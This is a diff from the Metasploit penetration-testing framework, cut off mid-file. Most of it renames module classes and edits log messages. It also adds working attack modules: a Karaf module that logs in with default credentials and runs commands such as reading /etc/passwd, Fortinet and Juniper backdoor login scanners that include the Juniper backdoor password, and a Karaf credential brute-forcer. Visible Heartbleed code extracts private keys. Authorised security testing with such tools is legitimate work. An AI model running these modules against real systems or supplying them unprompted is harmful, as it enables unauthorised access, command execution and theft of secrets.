Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index bad6580176..0a7f640504 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Cisco diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 8fe98c4273..8af295c94c 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb index 904d5e8b0f..1e09a58b45 100644 --- a/modules/auxiliary/scanner/snmp/sbg6580_enum.rb +++ b/modules/auxiliary/scanner/snmp/sbg6580_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 07530dafd5..ee6725b32a 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index dd54f5cd9e..596b5b508b 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 8886a67ae8..55ea5142b4 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 34a0940b48..e763078560 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index 980c437f15..ecc44d8fac 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/community_string_collection' require 'metasploit/framework/login_scanner/snmp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -16,8 +16,10 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'SNMP Community Scanner', - 'Description' => 'Scan for SNMP devices using common community names', + 'Name' => 'SNMP Community Login Scanner', + 'Description' => %q{ + This module logs in to SNMP devices using common community names. + }, 'Author' => 'hdm', 'References' => [ @@ -71,6 +73,14 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(credential_data) print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}" + report_service( + :host => ip, + :port => rport, + :proto => 'udp', + :name => 'snmp', + :info => result.proof, + :state => 'open' + ) else invalidate_login(credential_data) print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})" diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index edd07e2785..bf88ec862c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 445634756e..573424c908 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index c6cf8702bd..c9530ef9e9 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb new file mode 100644 index 0000000000..0aaf08e0bd --- /dev/null +++ b/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb @@ -0,0 +1,133 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => "Apache Karaf Default Credentials Command Execution", + 'Description' => %q{ + This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x. + The 'karaf' user has a known default password, which can be used to login to the + SSH service, and execute operating system commands from remote. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nicholas Starke ' + ], + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Apache Karaf', {}], + ], + 'Privileged' => true, + 'DisclosureDate' => "Feb 9 2016", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8101), + OptString.new('USERNAME', [true, 'Username', 'karaf']), + OptString.new('PASSWORD', [true, 'Password', 'karaf']), + OptString.new('CMD', [true, 'Command to Run', 'cat /etc/passwd']) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + end + + def rport + datastore['RPORT'] + end + + def username + datastore['USERNAME'] + end + + def password + datastore['PASSWORD'] + end + + def cmd + datastore['CMD'] + end + + def do_login(user, pass, ip) + opts = { + :auth_methods => ['password'], + :msframework => framework, + :msfmodule => self, + :port => rport, + :disable_agent => true, + :config => false, + :password => pass, + :record_auth_info => true, + :proxies => datastore['Proxies'] + } + + opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] + + begin + ssh = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh = Net::SSH.start(ip, user, opts) + end + rescue OpenSSL::Cipher::CipherError => e + print_error("#{ip}:#{rport} SSH - Unable to connect to this Apache Karaf (#{e.message})") + return + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{ip}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{ip}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{ip}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{ip}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh + print_good("#{ip}:#{rport}- Login Successful with '#{user}:#{pass}'") + else + print_error "#{ip}:#{rport} - Unknown error" + end + ssh + end + + def run_host(ip) + print_status("#{ip}:#{rport} - Attempt to login...") + ssh = do_login(username, password, ip) + if ssh + output = ssh.exec!("shell:exec #{cmd}\n").to_s + if output + print_good("#{ip}:#{rport} - Command successfully executed. Output: #{output}") + store_loot("apache.karaf.command", + "text/plain", + ip, + output) + vprint_status("#{ip}:#{rport} - Loot stored at: apache.karaf.command") + else + print_error "#{ip}:#{rport} - Command failed to execute" + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index 52becd24cc..f514ac63bb 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/detect_kippo.rb b/modules/auxiliary/scanner/ssh/detect_kippo.rb index 1b1371675c..9d260001ec 100644 --- a/modules/auxiliary/scanner/ssh/detect_kippo.rb +++ b/modules/auxiliary/scanner/ssh/detect_kippo.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb new file mode 100644 index 0000000000..4decb2fe61 --- /dev/null +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -0,0 +1,79 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Remote::Fortinet + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Fortinet SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Fortinet SSH backdoor. + }, + 'Author' => [ + 'operator8203 ', # PoC + 'wvu' # Module + ], + 'References' => [ + ['CVE', '2016-1909'], + ['EDB', '39224'], + ['PACKETSTORM', '135225'], + ['URL', 'http://seclists.org/fulldisclosure/2016/Jan/26'], + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ], + 'DisclosureDate' => 'Jan 9 2016', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: rport, + auth_methods: ['fortinet-backdoor'] + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'Fortimanager_Access', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb new file mode 100644 index 0000000000..a0d0c38ced --- /dev/null +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -0,0 +1,80 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'net/ssh' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Juniper SSH Backdoor Scanner', + 'Description' => %q{ + This module scans for the Juniper SSH backdoor (also valid on Telnet). + Any username is required, and the password is <<< %s(un='%s') = %u. + }, + 'Author' => [ + 'hdm', # Discovery + 'h00die ' # Module + ], + 'References' => [ + ['CVE', '2015-7755'], + ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor'], + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] + ], + 'DisclosureDate' => 'Dec 20 2015', + 'License' => MSF_LICENSE + )) + + register_options([ + Opt::RPORT(22) + ]) + + register_advanced_options([ + OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]), + OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10]) + ]) + end + + def run_host(ip) + ssh_opts = { + port: rport, + auth_methods: ['password', 'keyboard-interactive'], + password: %q{<<< %s(un='%s') = %u} + } + + ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] + + begin + ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do + Net::SSH.start( + ip, + 'admin', + ssh_opts + ) + end + rescue Net::SSH::Exception => e + vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}") + return + end + + if ssh + print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u") + report_vuln( + :host => ip, + :name => self.name, + :refs => self.references, + :info => ssh.transport.server_version.version + ) + end + end + + def rport + datastore['RPORT'] + end + +end diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb new file mode 100644 index 0000000000..723e085d0f --- /dev/null +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -0,0 +1,138 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' +require 'metasploit/framework/login_scanner/ssh' +require 'metasploit/framework/credential_collection' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + DEFAULT_USERNAME = 'karaf' + DEFAULT_PASSWORD = 'karaf' + + def initialize + super( + 'Name' => 'Apache Karaf Login Utility', + 'Description' => %q{ + This module attempts to log into Apache Karaf's SSH. If the TRYDEFAULTCRED option is + set, then it will also try the default 'karaf' credential. + }, + 'Author' => [ + 'Samuel Huckins', + 'Brent Cook', + 'Peer Aagaard', + 'Greg Mikeska', + 'Dev Mohanty' + ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + # TODO Set default user, pass + Opt::RPORT(8101), + OptBool.new('TRYDEFAULTCRED', [true, 'Specify whether to try default creds', true]) + ], self.class + ) + + register_advanced_options( + [ + Opt::Proxies, + OptBool.new('STOP_ON_SUCCESS', [ false, '', true]), + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + def rport + datastore['RPORT'] + end + + def gather_proof + proof = '' + begin + Timeout.timeout(5) do + proof = ssh_socket.exec!("shell:info\n").to_s + end + rescue Timeout::Error + end + proof + end + + def run_host(ip) + @ip = ip + print_status("Attempting login to #{ip}:#{rport}...") + + cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], + password: datastore['PASSWORD'], + user_file: datastore['USER_FILE'], + userpass_file: datastore['USERPASS_FILE'], + username: datastore['USERNAME'], + user_as_pass: datastore['USER_AS_PASS'] + ) + + if datastore['TRYDEFAULTCRED'] + if datastore['USERNAME'].blank? && datastore['PASSWORD'].blank? + cred_collection.add_public(DEFAULT_USERNAME) + cred_collection.add_private(DEFAULT_PASSWORD) + else + cred_collection.username = DEFAULT_USERNAME + cred_collection.password = DEFAULT_PASSWORD + end + end + + scanner = Metasploit::Framework::LoginScanner::SSH.new( + host: ip, + port: rport, + cred_details: cred_collection, + proxies: datastore['Proxies'], + stop_on_success: datastore['STOP_ON_SUCCESS'], + connection_timeout: datastore['SSH_TIMEOUT'], + framework: framework, + framework_module: self, + ) + + scanner.scan! do |result| + credential_data = result.to_h + credential_data.merge!( + module_fullname: self.fullname, + workspace_id: myworkspace_id + ) + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'" + credential_core = create_credential(credential_data) + credential_data[:core] = credential_core + create_credential_login(credential_data) + when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + if /key length too short/i === result.proof.message + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof} (net/ssh out of date)" + else + vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect to Apache Karaf: #{result.proof}" + end + + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + invalidate_login(credential_data) + when Metasploit::Model::Login::Status::INCORRECT + vprint_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'" + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + else + invalidate_login(credential_data) + scanner.ssh_socket.close if scanner.ssh_socket && !scanner.ssh_socket.closed? + end + end + end +end diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 3379adad44..0b817c1c14 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index 6a066ffef3..dffbe52e5e 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/ssh' require 'sshkey' # TODO: Actually include this! -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index e6925f9660..c804ba9b4c 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 2fd040823b..be4b190e3f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index 5371196d34..2f64059d2f 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'recog' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary resp = sock.get_once(-1, timeout) if ! resp - vprint_warning("#{peer} no response") + vprint_warning("No response") return end @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary info = "" if /^SSH-\d+\.\d+-(.*)$/ !~ ident - vprint_warning("#{peer} was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") + vprint_warning("Was not SSH -- #{resp.size} bytes beginning with #{resp[0, 12]}") return end @@ -85,11 +85,11 @@ class Metasploit3 < Msf::Auxiliary end end - print_status("#{peer} SSH server version: #{ident}#{info}") + print_status("SSH server version: #{ident}#{info}") report_service(host: rhost, port: rport, name: 'ssh', proto: 'tcp', info: ident) end rescue Timeout::Error - vprint_warning("#{peer} timed out after #{timeout} seconds. Skipping.") + vprint_warning("Timed out after #{timeout} seconds. Skipping.") ensure disconnect end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 69f1e4cfa4..9431875ba8 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -123,16 +123,16 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending CCS...") + vprint_status("Sending CCS...") sock.put(ccs) alert = sock.get_once(-1, response_timeout) if alert.blank? - print_good("#{peer} - No alert after invalid CCS message, probably vulnerable") + print_good("No alert after invalid CCS message, probably vulnerable") report elsif alert.unpack("C").first == ALERT_RECORD_TYPE - vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable") + vprint_error("Alert record as response to the invalid CCS Message, probably not vulnerable") elsif alert - vprint_warning("#{peer} - Unexpected response.") + vprint_warning("Unexpected response.") end end @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Auxiliary def establish_connect connect - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_hello = sock.get_once(-1, response_timeout) unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + vprint_error("No Server Hello after #{response_timeout} seconds...") disconnect return nil end unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 6d1a466b31..854d0e8969 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(ip) @check_only = true - vprint_status "#{peer} - Checking for Heartbleed exposure" + vprint_status "Checking for Heartbleed exposure" if bleed Exploit::CheckCode::Appears else @@ -339,13 +339,13 @@ class Metasploit3 < Msf::Auxiliary if jabber_host && jabber_host[1] disconnect establish_connect - vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") + vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = get_data end end if res.nil? || res.include?('stream:error') || res !~ / rhost, :port => rport, @@ -519,7 +519,7 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed server memory' ) - print_status("#{peer} - Heartbeat data stored in #{path}") + print_status("Heartbeat data stored in #{path}") end # Convert non-printable characters to periods @@ -536,7 +536,7 @@ class Metasploit3 < Msf::Auxiliary end # Show abbreviated data - vprint_status("#{peer} - Printable info leaked:\n#{abbreviated_data}") + vprint_status("Printable info leaked:\n#{abbreviated_data}") end @@ -550,24 +550,24 @@ class Metasploit3 < Msf::Auxiliary disconnect return if connect_result.nil? - print_status("#{peer} - Scanning for private keys") + print_status("Scanning for private keys") count = 0 - print_status("#{peer} - Getting public key constants...") + print_status("Getting public key constants...") n, e = get_ne if n.nil? || e.nil? - print_error("#{peer} - Failed to get public key, aborting.") + print_error("Failed to get public key, aborting.") end - vprint_status("#{peer} - n: #{n}") - vprint_status("#{peer} - e: #{e}") - print_status("#{peer} - #{Time.now.getutc} - Starting.") + vprint_status("n: #{n}") + vprint_status("e: #{e}") + print_status("#{Time.now.getutc} - Starting.") max_keytries.times { # Loop up to MAX_KEYTRIES times, looking for keys if count % status_every == 0 - print_status("#{peer} - #{Time.now.getutc} - Attempt #{count}...") + print_status("#{Time.now.getutc} - Attempt #{count}...") end bleedresult = bleed @@ -577,7 +577,7 @@ class Metasploit3 < Msf::Auxiliary unless p.nil? || q.nil? key = key_from_pqe(p, q, e) - print_good("#{peer} - #{Time.now.getutc} - Got the private key") + print_good("#{Time.now.getutc} - Got the private key") print_status(key.export) path = store_loot( @@ -588,18 +588,18 @@ class Metasploit3 < Msf::Auxiliary nil, 'OpenSSL Heartbleed Private Key' ) - print_status("#{peer} - Private key stored in #{path}") + print_status("Private key stored in #{path}") return end count += 1 } - print_error("#{peer} - Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") + print_error("Private key not found. You can try to increase MAX_KEYTRIES and/or HEARTBEAT_LENGTH.") end # Returns the N and E params from the public server certificate def get_ne unless @cert - print_error("#{peer} - No certificate found") + print_error("No certificate found") return end @@ -619,7 +619,7 @@ class Metasploit3 < Msf::Auxiliary # Only try candidates that have a chance... q, rem = n / can if rem == 0 && can != n - vprint_good("#{peer} - Found factor at offset #{x.to_s(16)}") + vprint_good("Found factor at offset #{x.to_s(16)}") p = can return p, q end @@ -692,7 +692,7 @@ class Metasploit3 < Msf::Auxiliary hdr = get_data(SSL_RECORD_HEADER_SIZE) unless hdr - vprint_error("#{peer} - No SSL record header received after #{response_timeout} seconds...") + vprint_error("No SSL record header received after #{response_timeout} seconds...") return nil end @@ -700,7 +700,7 @@ class Metasploit3 < Msf::Auxiliary data = get_data(len) unless data - vprint_error("#{peer} - No SSL record contents received after #{response_timeout} seconds...") + vprint_error("No SSL record contents received after #{response_timeout} seconds...") return nil end diff --git a/modules/auxiliary/scanner/steam/server_info.rb b/modules/auxiliary/scanner/steam/server_info.rb index 398e0fb038..e82b1bc79f 100644 --- a/modules/auxiliary/scanner/steam/server_info.rb +++ b/modules/auxiliary/scanner/steam/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/steam' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Steam diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 18cd6912cc..8b07f815ee 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -34,7 +34,7 @@ class Object end end -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb index c5beadbe05..117ab45ab4 100644 --- a/modules/auxiliary/scanner/telnet/brocade_enable_login.rb +++ b/modules/auxiliary/scanner/telnet/brocade_enable_login.rb @@ -8,7 +8,7 @@ require 'rex' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb index 061b3b1c10..86c676b14e 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_password.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include 